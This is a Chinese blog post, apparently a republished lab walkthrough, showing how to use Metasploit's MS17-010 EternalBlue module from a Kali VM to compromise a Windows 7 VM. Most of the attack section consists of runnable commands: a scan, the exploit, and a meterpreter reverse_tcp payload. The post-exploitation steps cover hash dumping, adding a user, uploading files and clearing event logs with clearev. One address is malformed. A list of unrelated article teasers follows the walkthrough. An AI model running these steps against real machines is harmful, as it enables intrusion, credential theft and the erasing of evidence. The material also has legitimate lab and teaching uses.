利用EternalBlue控制win7虚拟机

2023-12-03 18:38

本文主要是介绍利用EternalBlue控制win7虚拟机,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

利用EternalBlue控制win7虚拟机

WannaCry

https://www.sogou.com/link?url=DOb0bgH2eKjRiy6S-EyBciCDFRTZxEJgIH83_ioKlBAYUPdjyPzg-xvT47fi1v8bLv_Z_c0A1BdCJFQqz9HOu_13O0P_SOdx7XzrA381xFT2UTfnzsf64g…

http://blogs.360.cn/post/eternalblue_to_ransomware.html

EternalBlue

http://blogs.360.cn/post/nsa-eternalblue-smb.html

445端口

https://baike.baidu.com/item/445%E7%AB%AF%E5%8F%A3/3519185?fr=aladdin

使用工具

Metasploit

快速入门:

https://www.baidu.com/link?url=p62q40-hOOuX4nKi9g9LLqv_OYcrG392HMxX_P2wYhZXvnEMfjc8sgXC6yJ8F8bz&wd=&eqid=cd9a049f002c287d000000045db58842

用法大全:

https://blog.csdn.net/yanlongge/article/details/89490822

环境配置

靶机:Windows 7 x64虚拟机,IP地址为192.168.145.141
本机:Kali Linux,IP地址为192.168.145.134

控制过程

  • 查询两台虚拟机的IP地址
    在这里插入图片描述
  • 确认win 7靶机是否开放445端口

nmap -sV 192.168.145.141

在这里插入图片描述

  • 进入metaploit,利用msf的auxiliaty验证漏洞

msfconsole
search ms17-010

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  • 验证漏洞是否可利用

use auxiliary/scanner/smb/smb_ms17_010
set rhost 192.168.145.141
set rport 445
run

在这里插入图片描述

  • 设置好靶机地址、攻击端口和本机地址

use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.145.141
set rport 445
set lhost 192168.145.134

在这里插入图片描述

  • 使用payload攻击

set payload windows/x64/meterpreter/reverse_tcp

在这里插入图片描述

  • 枪已上膛,最后检查一下配置

show options

在这里插入图片描述
在这里插入图片描述

  • 冲啊!!!

run

在这里插入图片描述

  • PWN!!!返回控制通道
    在这里插入图片描述

搞破坏

  • 获取用户Hash值

hashdump

在这里插入图片描述

  • 获取system权限

sysinfo

在这里插入图片描述

  • 创建新用户

net user [用户名] /add

在这里插入图片描述
去win 7验证一下:
在这里插入图片描述

  • 上传文件

upload [文件] [靶机路径]

在这里插入图片描述
去win 7验证一下:
在这里插入图片描述
在这里插入图片描述

  • 清除事件日志

clearev

在这里插入图片描述

这篇关于利用EternalBlue控制win7虚拟机的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/450446

相关文章

用js控制视频播放进度基本示例代码

《用js控制视频播放进度基本示例代码》写前端的时候,很多的时候是需要支持要网页视频播放的功能,下面这篇文章主要给大家介绍了关于用js控制视频播放进度的相关资料,文中通过代码介绍的非常详细,需要的朋友可... 目录前言html部分:JavaScript部分:注意:总结前言在javascript中控制视频播放

Python异步编程中asyncio.gather的并发控制详解

《Python异步编程中asyncio.gather的并发控制详解》在Python异步编程生态中,asyncio.gather是并发任务调度的核心工具,本文将通过实际场景和代码示例,展示如何结合信号量... 目录一、asyncio.gather的原始行为解析二、信号量控制法:给并发装上"节流阀"三、进阶控制

使用DrissionPage控制360浏览器的完美解决方案

《使用DrissionPage控制360浏览器的完美解决方案》在网页自动化领域,经常遇到需要保持登录状态、保留Cookie等场景,今天要分享的方案可以完美解决这个问题:使用DrissionPage直接... 目录完整代码引言为什么要使用已有用户数据?核心代码实现1. 导入必要模块2. 关键配置(重点!)3.

SpringSecurity 认证、注销、权限控制功能(注销、记住密码、自定义登入页)

《SpringSecurity认证、注销、权限控制功能(注销、记住密码、自定义登入页)》SpringSecurity是一个强大的Java框架,用于保护应用程序的安全性,它提供了一套全面的安全解决方案... 目录简介认识Spring Security“认证”(Authentication)“授权” (Auth

python之流程控制语句match-case详解

《python之流程控制语句match-case详解》:本文主要介绍python之流程控制语句match-case使用,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐... 目录match-case 语法详解与实战一、基础值匹配(类似 switch-case)二、数据结构解构匹

Linux虚拟机不显示IP地址的解决方法(亲测有效)

《Linux虚拟机不显示IP地址的解决方法(亲测有效)》本文主要介绍了通过VMware新装的Linux系统没有IP地址的解决方法,主要步骤包括:关闭虚拟机、打开VM虚拟网络编辑器、还原VMnet8或修... 目录前言步骤0.问题情况1.关闭虚拟机2.China编程打开VM虚拟网络编辑器3.1 方法一:点击还原VM

Spring Security注解方式权限控制过程

《SpringSecurity注解方式权限控制过程》:本文主要介绍SpringSecurity注解方式权限控制过程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录一、摘要二、实现步骤2.1 在配置类中添加权限注解的支持2.2 创建Controller类2.3 Us

JAVA虚拟机中 -D, -X, -XX ,-server参数使用

《JAVA虚拟机中-D,-X,-XX,-server参数使用》本文主要介绍了JAVA虚拟机中-D,-X,-XX,-server参数使用,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有... 目录一、-D参数二、-X参数三、-XX参数总结:在Java开发过程中,对Java虚拟机(JVM)的启动参数进

Python中如何控制小数点精度与对齐方式

《Python中如何控制小数点精度与对齐方式》在Python编程中,数据输出格式化是一个常见的需求,尤其是在涉及到小数点精度和对齐方式时,下面小编就来为大家介绍一下如何在Python中实现这些功能吧... 目录一、控制小数点精度1. 使用 round() 函数2. 使用字符串格式化二、控制对齐方式1. 使用

Springboot控制反转与Bean对象的方法

《Springboot控制反转与Bean对象的方法》文章介绍了SpringBoot中的控制反转(IoC)概念,描述了IoC容器如何管理Bean的生命周期和依赖关系,它详细讲解了Bean的注册过程,包括... 目录1 控制反转1.1 什么是控制反转1.2 SpringBoot中的控制反转2 Ioc容器对Bea